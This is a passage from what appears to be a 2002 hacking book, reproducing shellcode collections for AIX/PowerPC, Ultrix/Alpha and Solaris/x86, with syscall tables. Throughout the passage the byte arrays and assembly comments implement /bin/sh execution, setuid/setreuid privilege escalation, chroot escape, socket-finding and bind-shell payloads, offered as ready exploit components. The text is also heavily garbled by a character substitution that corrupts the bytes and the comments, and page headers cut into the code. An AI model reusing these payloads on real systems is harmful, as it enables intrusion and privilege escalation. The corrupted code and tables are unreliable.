KOxD0Ox,cOx!0Ox!0K /- comb, Jret0,Jr0,QfindsckcodeN(0$ -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxb"OxceOx0#OxffK /- addi -0x,,Jr,C,Jr,C -/
KOxDDOx0eOxBfOxadK /- combf, Jr,C,Jr0,QfindsckcodeN,!$ -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOx(,Ox(,Ox,!OxBCK
KOxb"OxMMOx0(OxBfK /- addi -0xe,,Jr,!,Jr!" -/
KOxC#Ox!fOx0!Ox!0K /- ldh 0x,,0(Jr!"),Jr," -/
KOxC"OxM0OxBfOxdfK /- ldh -0x,,(Jr,!),Jr,( -/
KOxD!Ox0fOx!0Ox,0K /- comb, Jr,",Jr,(,QfindsckcodeNDD$ -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxDaOx0fOxBfOx(dK /- combf, Jr,",Jr,(,QfindsckcodeN,!$ -/
KOxb"OxceOx0#OxffK /- addi -0x,,Jr,C,Jr,C -/
KOxbCOx0fOxC0Ox0CK /- addi,Q 0x!,Jr0,Jr," -/
KOx0DOx0eOx0(Ox,aK /- add Jr,C,Jr0,Jr!( -/
KOx0DOx0fOx0(Ox,MK /- add Jr,",Jr0,Jr!" -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0OxbCK /- addi,$ 0x"a,Jr0,Jr!! -/
KOxDDOx0fOxBfOxcdK /- combf, Jr,",Jr0,QfindsckcodeNM!$ -/
KOxb"OxefOx0#OxffK /- addi -0x,,Jr,",Jr," -/
;
char bindsckcode./ /- B#-C b>tes -/
KOxbCOx,#OxC0Ox0CK /- addi,Q 0x!,Jr0,Jr!B -/
KOxeMOxM#OxC0Ox0!K /- blr,n Jr!B,Jr,! -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOx0aOxf#Ox0!OxM#K /- xor Jr!B,Jr!B,Jr!B -/
KOxeDOxC0Oxc0Ox0!K /- b?,n 0(Jr*) -/
KOx(,Ox0!Ox!BOxC"K
KOxbCOx,aOxC0Ox0CK /- addi,Q 0x!,Jr0,Jr!( -/
KOxbCOx,MOxC0Ox0!K /- addi,Q 0x,,Jr0,Jr!" -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxeDOx"fOx,fOxadK /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!OxCCK /- addi,$ 0x,!!,Jr0,Jr!! -/
KOx0DOx,cOx0(Ox0dK /- add Jret0,Jr0,Jr,B -/
KOxb"OxDcOxC0Ox,0K /- addi,Q 0xD,Jr,!,Jr,! -/
KOxbCOx,DOxC0Ox!0K /- addi,Q 0x,0,Jr0,Jr!C -/
KOx0DOx0dOx0(Ox,aK /- add Jr,B,Jr0,Jr!( -/
KOx0dOxD0Ox,!OxDaK /- stE Jr0,0x"(Jr,!) -/
KOxb"OxMMOxC0Ox0!K /- addi,Q 0x,,Jr,!,Jr!" -/
KOxeDOx"fOx,fOx(dK /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!Ox!DK /- addi,$ 0x,,C,Jr0,Jr!! -/
KOx0DOx0dOx0(Ox,aK /- add Jr,B,Jr0,Jr!( -/
KOxbCOx,MOxC0Ox0!K /- addi,Q 0x,,Jr0,Jr!" -/
KOxeDOx"fOx,fOxCdK /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!OxB!K /- addi,$ 0x,,M,Jr0,Jr!! -/
KOx0DOx0dOx0(Ox,aK /- add Jr,B,Jr0,Jr!( -/
KOx0bOxBMOx0!OxMMK /- xor Jr!",Jr!",Jr!" -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOxeDOx"fOx,fOx!"K /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#!Ox!(K /- addi,$ 0x,,B,Jr0,Jr!! -/
KOxbCOx0eOxC0Ox0CK /- addi,Q 0x!,Jr0,Jr,C -/
KOx0DOx,cOx0(Ox0cK /- add Jret0,Jr0,Jr,! -/
KOx0DOx0cOx0(Ox,aK /- add Jr,!,Jr0,Jr!( -/
KOx0DOx0eOx0(Ox,MK /- add Jr,C,Jr0,Jr!" -/
KOxeDOx"fOx,eOxf"K /- bl QbindsckcodeNC$,Jr* -/
KOxbCOx,(Ox#0OxbCK /- addi,$ 0x"a,Jr0,Jr!! -/
KOxDDOx0eOxBfOxd"K /- combf, Jr,C,Jr0,QbindsckcodeN,!C$ -/
KOxb"OxceOx0#OxffK /- addi -0x,,Jr,C,Jr,C -/
;
char %um*./
KOxe0OxC0Ox00Ox00K /- be 0x0(Jsr0,Jr*) -/
KOxB#OxdcOx00Ox00K /- co*> Js*,Jret0 -/
;
Hdefine 2I3F689@7:5726 "D
Hdefine AI3F689@7:5726 !(
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
Hendif
AIX/PO!R/Po"erPC codes, file: po"erpc-aix
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for aix C., C.! C.B *oEer/*oEer*c H-/
/-
s>scall Jr! Jr! Jr! JrB,JrC,Jr"
----------- ---- ---- ---- -----------------------------------------------------
exec?e x00B x00! x00C -$*athK/bin/shK,-$.-$a0*ath,0/,0
exec?e x00B x00! x00C -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/,0
seteuid x0(D x0#, x0D! euid0
mkdir x0#f x0De x0a0 -$*athKt..K,mode (each ?alue is ?alid)
chroot x0(f x0#D x0DM -$*ath)Kt..K,K.K0
chdir x0(d x0#( x0D# -$*athK..K
get*eername x0C, x0C( x0"B sfd,-$sadr./,-$.len0x!c/
socket x0"# x0"b x0(M 12'I345!,6789'65:41;,,*rot0
bind x0"( x0"a x0(D sfd,-$sadr.0x!c,0x0!,hi,lo,0,0,0,0/,len0x,0
listen x0"" x0"M x0(# sfd,backlog"
acce*t x0"B x0"D x0(" sfd,0,0
close x0"e x0(! x0#, fd)0,,,!0
kfcntl x0d( x0e# x0fc sfd,2'F<@2F0,fd)0,,,!0
?C., ?C.! ?C.B
-/
Hif defined(@7V4:@8) ++ defined(1IL)
char 'shellcode./ /- ,!-CND b>tes -/
KOx#cOxa"Ox!aOx#MK /- xor. r",r",r" -/
KOxC0OxD!OxffOxfdK /- bnel Qshellcode$ -/
KOx#fOxeDOx0!Oxa(K /- mflr rB, -/
KOxBbOxffOx0,Ox!0K /- cal rB,,0x,!0(rB,) -/
KOxBDOx#fOxffOx0DK /- cal rB,-!CD(rB,) -/
KOxBDOxMfOxffOx,0K /- cal rC,-!C0(rB,) -/
KOxM0Ox#fOxffOx,0K /- st rB,-!C0(rB,) -/
KOxM0OxbfOxffOx,CK /- st r",-!B((rB,) -/
KOxDDOx"fOxffOx0fK /- lb& r!,-!C,(rB,) -/
KOxMDOxbfOxffOx0fK /- stb r",-!C,(rB,) -/
KOxCcOxc(OxBBOxC!K /- crorc cr(,cr(,cr( -/
KOxCCOxffOxffOx0!K /- s?ca -/
K/bin/shK
Hifdef SC,
KOx0BK
Hendif
Hifdef SC!
KOx0!K
Hendif
Hifdef SCB
KOx0CK
Hendif
;
char 'setreuidshellcode./ /- ,M-CN# b>tes -/
KOx#eOxMCOxa!Ox#MK /- xor. r!0,r!0,r!0 -/
KOxC0OxD!OxffOxfdK /- bnel (setreuidcode) -/
KOx#eOxaDOx0!Oxa(K /- mflr r!, -/
KOxBaOxb"Ox0,OxC0K /- cal r!,,0x,C0(r!,) -/
KOxDDOx""OxfeOxe0K /- lb& r!,-!DD(r!,) -/
KOx#eOxDBOxaBOx#DK /- mr rB,r!0 -/
KOxBaOxd"OxfeOxeCK /- cal r!!,-!DC(r!,) -/
KOx#eOxcDOx0BOxa(K /- mtlr r!! -/
KOxCcOxc(OxBBOxC!K /- crorc cr(,cr(,cr( -/
KOxCCOxffOxffOx0!K /- s?ca -/
Hifdef SC,
KOx(DOx0BOxffOxffK
Hendif
Hifdef SC!
KOx#,Ox0!OxffOxffK
Hendif
Hifdef SCB
KOxD!Ox0COxffOxffK
Hendif
KOxBDOx#"OxffOx0CK /- cal rB,-!"!(r!,) -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxBDOxM"OxffOx0cK /- cal rC,-!CC(r!,) -/
KOx#eOxD"OxaBOx#DK /- mr r",r!0 -/
KOxM0Ox#"OxffOx0cK /- st rB,-!CC(r!,) -/
KOxM!OxM"OxffOx,0K /- st r!0,-!C0(r!,) -/
KOxDDOx""OxfeOxe,K /- lb& r!,-!D#(r!,) -/
KOxMaOxM"OxffOx0bK /- stb r!0,-!C"(r!,) -/
KOxCbOxffOxffOxdDK /- bl (setreuidcodeNB!) -/
K/bin/shK
;
char s>scallcode./ /- ,C-C b>tes -/
KOx#eOxMCOxa!Ox#MK /- xor. r!0,r!0,r!0 -/
KOxC0OxD!OxffOxfdK /- bnel Qs>scallcode$ -/
KOx#eOxaDOx0!Oxa(K /- mflr r!, -/
KOxBaOxc0Ox0,OxffK /- lil r!!,0x,ff -/
KOxBaOxf(OxfeOx!dK /- cal r!B,-C(#(r!!) -/
KOx#eOxb"OxbaOx,CK /- cax r!,,r!,,r!B -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!0K /- bctr -/
Hifdef SC,
KOx0BOx(DOxC,Ox"eK
KOx(dOx#fOx(fOxd(K
KOx"#Ox"(Ox""Ox"BK
Hendif
Hifdef SC!
KOx0!Ox#,OxC(Ox(!K
KOx#(OxDeOx#DOxe#K
KOx"bOx"aOx"MOx"DK
Hendif
Hifdef SCB
KOx0COxD!Ox"BOx#,K
KOxD#Oxa0OxDMOxfcK
KOx(MOx(DOx(#Ox("K
Hendif
KOxCcOxc(OxBBOxC!K /- crorc cr(,cr(,cr( -/
KOxCCOxffOxffOx0!K /- s?ca 0x0 -/
KOxBaOxb"OxffOxfDK /- cal r!,,-D(r!,) -/
;
char shellcode./ /- ,!-CN# b>tes -/
KOx#cOxa"Ox!aOx#MK /- xor. r",r",r" -/
KOxC0OxD!OxffOxfdK /- bnel Qshellcode$ -/
KOx#fOxeDOx0!Oxa(K /- mflr rB, -/
KOxBbOxffOx0,Ox!0K /- cal rB,,0x,!0(rB,) -/
KOxBDOx#fOxffOx0DK /- cal rB,-!CD(rB,) -/
KOxBDOxMfOxffOx,0K /- cal rC,-!C0(rB,) -/
KOxM0Ox#fOxffOx,0K /- st rB,-!C0(rB,) -/
KOxM0OxbfOxffOx,CK /- st r",-!B((rB,) -/
KOxDDOx""OxffOxfCK /- lb& r!,-,!(r!,) -/
KOxMDOxbfOxffOx0fK /- stb r",-!C,(rB,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!0K /- bctr -/
K/bin/shK
;
char cmdshellcode./ /- ,#-CN,!Ncmdlen b>tes -/
KOx#cOxa"Ox!aOx#MK /- xor. r",r",r" -/
KOxC0OxD!OxffOxfdK /- bnel Qcmdshellcode$ -/
KOx#fOxeDOx0!Oxa(K /- mflr rB, -/
KOxBbOxffOx0,Ox!cK /- cal rB,,0x,!c(rB,) -/
KOxBDOx#fOxffOx,0K /- cal rB,-!C0(rB,) -/
KOxBDOxMfOxfeOxcDK /- cal rC,-B,!(rB,) -/
KOxBDOxdfOxffOx,DK /- cal r(,-!B!(rB,) -/
KOxBDOxffOxffOx,cK /- cal r#,-!!D(rB,) -/
KOxM0Ox#fOxfeOxcDK /- st rB,-B,!(rB,) -/
KOxM0OxdfOxfeOxccK /- st r(,-B0D(rB,) -/
KOxM0OxffOxfeOxd0K /- st r#,-B0C(rB,) -/
KOxM0OxbfOxfeOxdCK /- st r",-B00(rB,) -/
KOxMDOxbfOxffOx,#K /- stb r",-!BB(rB,) -/
KOxMDOxbfOxffOx,aK /- stb r",-!B0(rB,) -/
KOxDDOx""OxffOxfCK /- lb& r!,-,!(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!0K /- bctr -/
K/bin/sh -c K
/- command -/
;
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
char setreuidcode./ /- C-C b>tes -/
KOxDDOx""OxffOxf"K /- lb& r!,-,,(r!,) -/
KOx#eOxDBOxaBOx#DK /- mr rB,r!0 -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
;
char chrootcode./ /- !B-C b>tes -/
KOx!cOx#COx!eOx!eK /- cm*i cr0,r!0,0x!e!e -/
KOxC,OxD!OxffOxfdK /- beRl Qchrootcode$ -/
KOx#fOx0DOx0!Oxa(K /- mflr r!C -/
KOxM!OxMDOxffOxfcK /- st r!0,-C(r!C) -/
KOxBDOx#DOxffOxfMK /- cal rB,-#(r!C) -/
KOxDDOx""OxffOxfMK /- lb& r!,-#(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxBDOx#DOxffOxfMK /- cal rB,-#(r!C) -/
KOxDDOx""OxffOxfaK /- lb& r!,-((r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxBbOx!0Ox0,Ox0,K /- lil r!",0x,0, -/
KOxBDOx#DOxffOxfaK /- cal rB,-((r!C) -/
KOxDDOx""OxffOxfDK /- lb& r!,-D(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#OxBMOxffOxffK /- ai. r!",r!",-, -/
KOxC0OxD!OxffOxecK /- bne QchrootcodeN"!$ -/
KOxBDOx#DOxffOxfbK /- cal rB,-"(r!C) -/
KOxDDOx""OxffOxfaK /- lb& r!,-((r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
;
char findsckcode./ /- BD-C b>tes -/
KOx!cOx#COx,!OxBCK /- cm*i cr0,r!0,0x,!BC -/
KOxC,OxD!OxffOxfdK /- beRl Qfindsckcode$ -/
KOx#fOx0DOx0!Oxa(K /- mflr r!C -/
KOxBbOxB(OxfeOx!dK /- cal r!",-C(#(r!!) -/
KOxBbOxC0Ox0,Ox0,K /- lil r!(,0x,( -/
KOx#fOx#DOxcaOx,CK /- cax r!#,r!C,r!" -/
KOx#fOx(MOx0BOxa(K /- mtctr r!# -/
KOxCeOxD0Ox0COx!0K /- bctr -/
KOxaBOx#DOxffOxfeK /- lh& r!#,-!(r!C) -/
KOxaBOxMDOxffOxfaK /- lh& r!D,-((r!C) -/
KOx#cOx,bOxe0OxC0K /- cm*l cr0,r!#,r!D -/
KOxBbOxB(OxfeOx"MK /- cal r!",-C!B(r!!) -/
KOxC,OxD!OxffOxeCK /- beR QfindsckcodeN!0$ -/
KOx#fOxCBOxdBOx#DK /- mr rB,r!( -/
KOxBDOxMDOxffOxfcK /- cal rC,-C(r!C) -/
KOxBDOxbDOxffOxfCK /- cal r",-,!(r!C) -/
KOxMBOxBDOxffOxfCK /- st r!",-,!(r!C) -/
KOxDDOx""OxffOxf(K /- lb& r!,-,0(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#Ox"aOxffOxffK /- ai. r!(,r!(,-, -/
KOx!dOx0BOxffOxffK /- cm*i cr!,rB,-, -/
KOxC0OxDaOxffOxcDK /- bne cr!,QfindsckcodeNB!$ -/
KOxC0OxD!OxffOxdDK /- bne QfindsckcodeNCD$ -/
KOxBbOxB(OxfeOx0BK /- cal r!",-"0M(r!!) -/
KOxBbOx#(OxfeOx0!K /- cal r!#,-",0(r!!) -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOxDDOx""OxffOxf#K /- lb& r!,-M(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#cOx#aOxdaOx,CK /- cax rB,r!(,r!# -/
KOx#eOxDCOxaBOx#DK /- mr rC,r!0 -/
KOx#fOx!"OxcbOx#DK /- mr r",r!" -/
KOxDDOx""OxffOxfbK /- lb& r!,-"(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#OxBMOxffOxffK /- ai. r!",r!",-, -/
KOxC0OxD0OxffOxdCK /- bge QfindsckcodeN,00$ -/
;
char bindsckcode./ /- C!-C b>tes -/
KOx!cOx#COx,!OxBCK /- cm*i cr0,r!0,0x,!BC -/
KOxC,OxD!OxffOxfdK /- beRl Qbindsckcode$ -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx#fOx0DOx0!Oxa(K /- mflr r!C -/
KOxM!OxMDOxffOxfcK /- st r!0,-C(r!C) -/
KOxBDOx#(OxfeOx0BK /- cal rB,-"0M(r!!) -/
KOxBDOxM(OxfeOx0!K /- cal rC,-",0(r!!) -/
KOxMDOx#DOxffOxfMK /- stb rB,-#(r!C) -/
KOx#eOxD"OxaBOx#DK /- mr r",r!0 -/
KOxDDOx""OxffOxfcK /- lb& r!,-C(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#cOx#MOx,bOx#DK /- mr r!",rB -/
KOxBDOxMDOxffOxfDK /- cal rC,-D(r!C) -/
KOxBDOxb(OxfeOx,,K /- cal r",-CM"(r!!) -/
KOxDDOx""OxffOxfdK /- lb& r!,-B(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOxBDOxM(OxfeOx0(K /- cal rC,-"0((r!!) -/
KOxDDOx""OxffOxfeK /- lb& r!,-!(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOx#eOxDCOxaBOx#DK /- mr rC,r!0 -/
KOx#eOxD"OxaBOx#DK /- mr r",r!0 -/
KOxDDOx""OxffOxffK /- lb& r!,-,(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#cOx#MOx,bOx#DK /- mr r!",rB -/
KOxBbOx"(OxfeOx0BK /- cal r!(,-"0M(r!!) -/
KOx#fOxCBOxdBOx#DK /- mr rB,r!( -/
KOxDDOx""OxffOxf#K /- lb& r!,-M(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOx#fOx!BOxcbOx#DK /- mr rB,r!" -/
KOx#eOxDCOxaBOx#DK /- mr rC,r!0 -/
KOx#fOxC"OxdBOx#DK /- mr r",r!( -/
KOxDDOx""OxffOxfbK /- lb& r!,-"(r!,) -/
KOx#eOxaMOx0BOxa(K /- mtctr r!, -/
KOxCeOxD0Ox0COx!,K /- bctrl -/
KOxB#Ox"aOxffOxffK /- ai. r!(,r!(,-, -/
KOxC0OxD0OxffOxdCK /- bge QbindsckcodeN,!0$ -/
;
Hdefine 2I3F689@7:5726 !
Hdefine AI3F689@7:5726 !
Hendif
Ul#rix/A$PHA codes, file: alpha-ul#rix
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for ultrix ".0 al*ha H-/
/-
s>scall J?0 Ja0,Ja,,Ja!,JaB
----------- ---- ---------------------------------------------------------------
exec? x00b -$*athK/bin/shK,-$.-$a0*ath,0/
exec? x00b -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setreuid x0#e ruid,euid0
-/
Hif defined(1=@U1) ++ defined(<=5:IL)
char shellcode./ /- ,D-CN# b>tes -/
KOxfbOx(bOx#fOx!(K /- ldah aB,!#(CB(&ero) -/
KOx0,OxD0Ox#BOx!!K /- lda aB,-B!#(#(aB) -/
KOxC0Ox0,Ox#eOxb!K /- stl aB,B!0(s*) -/
KOxC0Ox0,OxMeOx!!K /- lda aC,B!0(s*) -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
KOxD0OxD!Ox"aOx!BK /- lda ra,-B!,!D(ra) -/
KOx,!Ox0COxffOxC#K /- bis &ero,&ero, a! -/
KOxbbOx#dOxfaOxBbK /- stb &ero,B!,D#(ra) -/
KOxbCOx#dOx,aOx!!K /- lda a0,B!,D0(ra) -/
KOxcCOx#dOx,aOxb(K /- stR a0,B!,M((ra) -/
KOxcCOx#dOxBaOx!!K /- lda a,,B!,M((ra) -/
KOxccOx#dOxfaOxb#K /- stR &ero,B!!0C(ra) -/
KOx,BOx#COxf0OxC#K /- bis &ero,0xDB,aB -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxD0Ox!0Ox#eOxb!K /- stl aB,DB!0(s*) -/
KOxD0Ox!0OxMeOx!!K /- lda aC,DB!0(s*) -/
KOxbbOx0!OxbfOx!!K /- lda a",(MM(&ero) -/
KOx"0OxfdOx,"Ox!0K /- lda ?0,-(C0(a") -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
K/bin/shK
;
char cmdshellcode./ /- !!-CN# b>tes -/
KOxfbOx(bOx#fOx!(K /- ldah aB,!#(CB(&ero) -/
KOx0,OxD0Ox#BOx!!K /- lda aB,-B!#(#(aB) -/
KOxC0Ox0,Ox#eOxb!K /- stl aB,B!0(s*) -/
KOxC0Ox0,OxMeOx!!K /- lda aC,B!0(s*) -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
KOxD0OxD!Ox"aOx!BK /- lda ra,-B!,!D(ra) -/
KOxcbOx#dOxfaOxBbK /- stb &ero,B!!0B(ra) -/
KOxceOx#dOxfaOxBbK /- stb &ero,B!!0((ra) -/
KOxcCOx#dOx,aOx!!K /- lda a0,B!,M((ra) -/
KOx"cOx#dOx,aOxb(K /- stR a0,B!0M!(ra) -/
KOxccOx#dOx#aOx!!K /- lda aB,B!!0C(ra) -/
KOx(COx#dOx#aOxb(K /- stR aB,B!,00(ra) -/
KOxd0Ox#dOx#aOx!!K /- lda aB,B!!0D(ra) -/
KOx(cOx#dOx#aOxb(K /- stR aB,B!,0D(ra) -/
KOx#COx#dOxfaOxb#K /- stR &ero,B!,,((ra) -/
KOx"cOx#dOxBaOx!!K /- lda a,,B!0M!(ra) -/
KOx,BOx#COxf0OxC#K /- bis &ero,0xDB,aB -/
KOxD0Ox!0Ox#eOxb!K /- stl aB,DB!0(s*) -/
KOxD0Ox!0OxMeOx!!K /- lda aC,DB!0(s*) -/
KOxbbOx0!OxbfOx!!K /- lda a",(MM(&ero) -/
KOx"0OxfdOx,"Ox!0K /- lda ?0,-(DD(a") -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
K/bin/sh -c K
;
char setreuidcode./ /- ,,-C b>tes -/
KOxffOxffOx,fOx!!K /- lda a0,-,(&ero) -/
KOx,,Ox0COxffOxC#K /- bis &ero,&ero,a, -/
KOxbbOx0!OxbfOx!!K /- lda a",(MM(&ero) -/
KOxcBOxfdOx,"Ox!0K /- lda ?0,-"#B(a") -/
KOx,BOx#COxf0OxC#K /- bis &ero,0xDB,aB -/
KOxD0Ox0!Ox#eOxb!K /- stl aB,(C0(s*) -/
KOxD0Ox0!OxMeOx!!K /- lda aC,(C0(s*) -/
KOxfbOx(bOx#fOx!(K /- ldah aB,!#(CB(&ero) -/
KOx0,OxD0Ox#BOx!!K /- lda aB,-B!#(#(aB) -/
KOxDCOx0!Ox#eOxb!K /- stl aB,(CC(s*) -/
KOx,0OxC0Ox"COx(bK /- %sr ra,(aC),0x,0 -/
;
char %um*./
KO00OxC0OxdeOxC#K /- bis s*,s*,?0 -/
KO0,OxD0OxfaOx(bK /- ret &ero,(ra),, -/
;
Hendif
Solaris/x%& codes, file: x%&-solaris
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for solaris !.( !.# !.D xD( H-/
/-
s>scall Jeax stack
----------- ---- ---------------------------------------------------------------
exec x00b ret,-$*athK/bin/kshK,-$.-$a0*ath,0/
exec x00b ret,-$*athK/bin/kshK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setuid x0,# ret,uid0
mkdir x0"0 ret,-$*athKb..K,mode (each ?alue is ?alid)
chroot x0Bd ret,-$*ath)Kb..K,K.K0
chdir x00c ret,-$*athK..K
ioctl x0B( ret,sfd,5I'I45@44:31;40x"CM,,-$.mlen0xM,,len0xM,,-$sadr.//
so'socket x0e( ret,12'I345!,6789'65:41;!,*rot0,de?*ath0,67S'F421<=5,
bind x0eD ret,sfd,-$sadr.0xff,!,hi,lo,0,0,0,0/,len0x,0,67S'678965:41;!
listen x0eM ret,sfd,backlog",?ers (not reRuired in this s>scall)
acce*t x0ea ret,sfd,0,0,?ers (not reRuired in this s>scall)
fcntl x0Be ret,sfd,2'F<@!2F0x0M,fd)0,,,!0
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
-/
Hif defined(LD() ++ defined(67=1:I6)
char 'shellcode./ /- BBND b>tes -/
KOxebOx,aK /- %m* QshellcodeN!D$ -/
KOxBBOxd!K /- xorl Jedx,Jedx -/
KOx"DK /- *o*l Jeax -/
KOxDdOx#DOx,CK /- leal 0x,C(Jeax),Jedi -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM!K /- xchgl Jeax,Jedx -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDDOxC!Ox0DK /- mo?b Jal,0xD(Jedx) -/
KOxDBOxefOxBbK /- subl P0xBb,Jedi -/
KOxb0OxMaK /- mo?b P0xMa,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxC#K /- incl Jedi -/
KOxb0Ox0#K /- mo?b P0x0#,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxeDOxe,OxffOxffOxffK /- call QshellcodeN!$ -/
K/bin/kshK
;
char s>scallcode./ /- !( b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxebOx0MK /- %m* Qs>scallcodeN,B$ -/
KOx"fK /- *o*l Jedi -/
KOx"#K /- *ushl Jedi -/
KOxC#K /- incl Jedi -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxC#K /- incl Jedi -/
KOxaaK /- stosb Jal,JesG(Jedi) -/
KOx"eK /- *o*l Jesi -/
KOxebOx0dK /- %m* Qs>scallcodeN!($ -/
KOxeDOxf!OxffOxffOxffK /- call Qs>scallcodeNC$ -/
KOxMaOxffOxffOxffOxffK
KOx0#OxffK
KOxcBK /- ret -/
;
char shellcode./ /- !"ND b>tes -/
KOxebOx,!K /- %m* QshellcodeN!0$ -/
KOxBBOxd!K /- xorl Jedx,Jedx -/
KOx"DK /- *o*l Jeax -/
KOxDdOx#DOx,CK /- leal 0x,C(Jeax),edi -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM!K /- xchgl Jeax,Jedx -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDDOxC!Ox0DK /- mo?b Jal,0xD(Jedx) -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxeDOxeMOxffOxffOxffK /- call QshellcodeN!$ -/
K/bin/kshK
;
char cmdshellcode./ /- B(N,!Ncmdlen b>tes -/
KOxebOx,dK /- %m* QcmdshellcodeNB,$ -/
KOxBBOxd!K /- xorl Jedx,Jedx -/
KOx"DK /- *o*l Jeax -/
KOxDdOx#DOxacK /- leal -0xCC(Jeax),edi -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxDDOx"0Ox0DK /- mo?b Jdl,0xD(Jeax) -/
KOxDDOx"0Ox0bK /- mo?b Jdl,0xb(Jeax) -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDdOxC0Ox0MK /- leal 0x0M(Jeax),Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDdOxC0Ox0BK /- leal 0x0B(Jeax),Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM!K /- xchgl Jeax,Jedx -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxffOxd(K /- call -Jesi -/
KOxeDOxdeOxffOxffOxffK /- call QcmdshellcodeN!$ -/
K/bin/ksh -c K
/- command -/
;
char setuidcode./ /- # b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
